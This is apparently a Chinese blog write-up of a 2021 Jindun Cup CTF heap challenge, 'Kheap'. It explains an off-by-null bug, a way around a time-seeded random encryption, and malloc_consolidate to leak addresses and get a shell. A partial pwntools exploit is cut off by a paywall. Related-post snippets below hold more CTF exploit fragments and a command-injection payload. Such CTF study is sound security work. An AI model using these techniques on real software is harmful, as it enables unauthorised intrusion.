2021 金盾杯 pwn4

最新推荐文章于 2025-01-18 10:56:43 发布
原创 最新推荐文章于 2025-01-18 10:56:43 发布 · 477 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#网络安全

本文介绍了一种名为Kheap的程序中存在的漏洞利用方法。通过对输入内容的加密算法进行分析,利用随机数绕过加密,结合内存管理技巧如mallocconsilidate解决chunk大小不足的问题,最终实现地址泄露并获取shell。

在这里插入图片描述
保护是全开的

add
在这里插入图片描述
我们注意到首先会对我们的输入内容进行加密。

在这里插入图片描述加密的算法里面大量用到随机数,但是不重要,伪随机我们可以通过在脚本中使用随机数来绕过。

在这里插入图片描述

有个off by null。

delete
在这里插入图片描述正常delete,没啥问题。

edit
在这里插入图片描述也存在那个off by off。

show
在这里插入图片描述
正常show,show出来我们需要解密。

所以整体看下来就是off by null然后加了一个加密程序。
我们只需要通过随机数绕过那个加密,利用malloc consilidate解决chunk大小不够,不好泄露地址的问题,就可以了。

exp

#coding:utf-8
from pwn import *
from ctypes import *
context.log_level='debug'
context.arch='amd64'

elf=ELF('./Kheap')
libc=ELF('/home/wuangwuang/glibc-all-in-one-master/glibc-all-in-one-master/libs/2.27-3ubuntu1_amd64/libc.so.6')
libcc = cdll.LoadLibrary("/lib/x86_64-linux-gnu/libc.so.6")
time=libcc.time(0)
libcc.srand(time)

r = process('./Kheap')
def decode(a,b):
    s=''
    p=libcc.rand()%256
    q=libcc.rand()%256
    m=libcc.rand
最低0.47元/天 解锁文章
bugku_pwn4
Vicl1fe的博客
10-26 532
https://blog.youkuaiyun.com/casuall/article/details/95865447
2021-河南省金盾杯-部分题目wp(详细)
02-06
WEB:上传你的头像吧、上传你的压缩包吧、管理员才能拿flag Crypto:Hi There、低音吉他谱、未完成的宣传图 Misc:潦草的笔记、这可是关键信息、hello-world Reverse:Re1、Re2、Re4
Bugku pwn4
、moddemod
05-26 388
找不到/bin/sh字符串,存在$0 这里因为64位程序与32位不同是通过寄存器传参的 思路,通过read函数溢出栈空间0x10大小,构造ROP链,调用system,通过rdi给system传参 exp from pwn import * p = remote('114.116.54.89' ,10004) rop = 0x4007d3 _system = 0x400570 bin_sh = 0x60111f p.recvuntil('Come on,try to pwn me') pa...
Pwn4 - Bugku
SkYe's Blog
10-22 450
Pwn4 - Bugku 程序基本情况 程序为64位,保护全关 代码审计 在main()函数中的read造成了栈溢出 IDAshift + F12检查有没有可疑字符串,同时检查有没有特殊函数如getshell() 在sub_400751()里面出现了调用system() 思路 main()函数存在栈溢出,可调用system()getshell,但是缺少一个参数/bin/sh。在字符串查找中...
PWN · setcontext】[2024网鼎杯 · 青龙组] PWN4
Mr_Fmnwon的博客
10-30 1888
套的东西比较多,RC4加解密、账号密码爆破、沙箱。不过libc版本2.27,加之存在UAF,所以如果没有那些限制,其实还是很好过的。接下来我将按照我当时做题的思路过一遍。
2021鹤城杯pwn部分wp
eeeeeight的博客
10-09 2510
littleof 白给的ret2libc, 第一个输出泄露canary, 第二个输出泄露libc基址顺便控制一下返回地址再返回去输入, 之后就getshell咯(摊手) #!/usr/bin/env python #coding=utf-8 from pwn import* sh = remote("182.116.62.85", 27056) #sh = process('./littleof') elf = ELF('./littleof') libc = ELF('./libc-2.27.so')
赣网杯2021_pwn1.rar
12-11
赣网杯2021 pwn1 bin ctf
2021东华杯pwn部分wp
eeeeeight的博客
11-01 1946
前言: 除了boom都蛮简单的, 第四个pwn因为boom做的有点久就没来得及, 看了眼感觉不难也就不想花时间再做了 cpp1: 由于change时std::cin的大小没有控制好, 所以cin可以输入很多字符, 导致了堆溢出, 且申请回来的时候没有手动清空fd位, 泄露了heap偏移, 得到了tcache结构体的地址, 利用堆溢出控制free块的fd就可以控制整个tcache结构体, 从而使得unsorted bin产生. 同上, 泄露libc偏移, 再利用fd写__free_hook与system, 再
2021羊城杯 pwn whats your name
yongbaoii的博客
09-24 446
libc是2.23的。 保护是全开的。 沙箱是有的。 菜单。 set name edit name puts name delete name
2021 金盾杯 pwn3 wp
yongbaoii的博客
01-20 689
保护显然是全开 放size的chunk跟放地址的chunk挨着 然后数组能越界 所以当我们申请序号是16的chunk的时候 chunk的地址会写在chunk0的size地方 就造成了堆溢出 然后我们申请的chunk只能是large bin里的。 所以这道题说白了就是 2.27 large bin 堆溢出。 我们试图考虑利用攻击global_max_fast的手法,我们虽然能够覆盖到global_max_fast,但是我们申请的chunk的大小不够,不够我们后续的chunk释放分配到_IO_list_.
pwn4(栈迁移的类型一)
最新发布
2401_87427870的博客
01-18 546
NX+填入的字节不够 = 考虑栈迁移。就一个参数,我们也就不需要计算偏移。ctfshow pwn入门75。很明显有格式化字符串漏洞。
ctfshow pwn4
qq_39980610的博客
08-22 855
我们知道,通常栈溢出的利用方式是通过溢出存在于栈上的局部变量,从而让多出来的数据覆盖 ebp、eip 等,从而达到劫持控制流的目的。当启用栈保护后,函数开始执行的时候会先往栈底插入 cookie 信息,当函数真正返回的时候会验证 cookie 信息是否合法 (栈帧销毁前测试该值是否被改变),如果不合法就停止程序运行 (栈溢出发生)。当程序停止在比对canary的时候我们可以看到栈上的0xc有了一个数据其实就是canary。我们可以分别将断点下在printf函数和程序比对canary的地址。
pwn4记录
weixin_55190422的博客
11-08 177
我们利用shift F12过滤找到 看一下保护措施 main反编译后的函数为这样 可以看到s的长度为0x3c,而我们只能输入32个字符,但是我们发现我们输入的I会被系统替换成you,所以我们输入20个I就可以填满S了。所以EXP: ...
pwn4-bugku
weixin_45427676的博客
09-18 799
checksec 首先用checksec命令查看有没有什么保护机制 没有开任何保护机制,用IDA(64位)打开查看main函数。 函数分析 # memset函数 # setvbuf函数 # read函数 经过分析函数可以知道缓冲区中是&s,大小为0x10uLL,read函数是将大小为0x30uLL的数据存放到缓冲区&s中,其大小超过了缓冲区的大小,存在栈溢出。 s大小 ...
Bugku-pwn4详解
Casuall的博客
07-14 4622
这道题来自bugku的第三道pwn题,pwn4。首先进行一些常规检查。 一个64位动态链接的程序,没有开什么保护。 然后用IDA打开,有个危险函数read,可以用来溢出。 shift + F12查看有没有可疑字符串,然后在字符串上按x查看引用他的地方,找到了一个system函数 但是system函数里面的字符串并不是我们想要的'/bin/sh',尝试用ROPgadget去搜索,命令为ROPg...
河南省第五届“金盾信安杯”网络与数据安全大赛-WP
tlp_zzm的博客
11-26 4406
看到该题之后发现是私钥加密,公钥解密脚本代码:n = p*qe=37777。
金盾杯2022-AGCTFS战队 wp
akxnxbshai的博客
12-20 2847
信安金盾杯pwn爷(加re)不在,只能打成这样了。
第二届金盾信安杯 web wp1-3
giaogiao123的博客
12-22 3328
by 七岁。 web1 考察命令执行 shell命令操作符 基本上过滤了所有可用的命令 平时我们都是ls 查看目录 仔细发现dir命令并没有被禁止 所以我们可以dir%09.%09 也是这样的 . 表示当前目录 然后就是读文件命令 被ban了那么多还有几个忽略了 cut 命令awk sed fmt等等 来看看cut命令 试一试别的 等等,最后payload cmd=cut%09-f%091%09F14g_1s_h4rehaha.php%09 web2 payload: Class W
2021莲城杯网络安全比赛题库精粹
资源摘要信息: "2021莲城杯比赛题包.zip" 标题:“2021莲城杯比赛题包.zip” 描述:“2021莲城杯比赛题包.zip” 标签:“ctf 2021莲城杯 网络安全” 知识点详细说明: 1. CTF (Capture The Flag) 竞赛: CTF是一...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值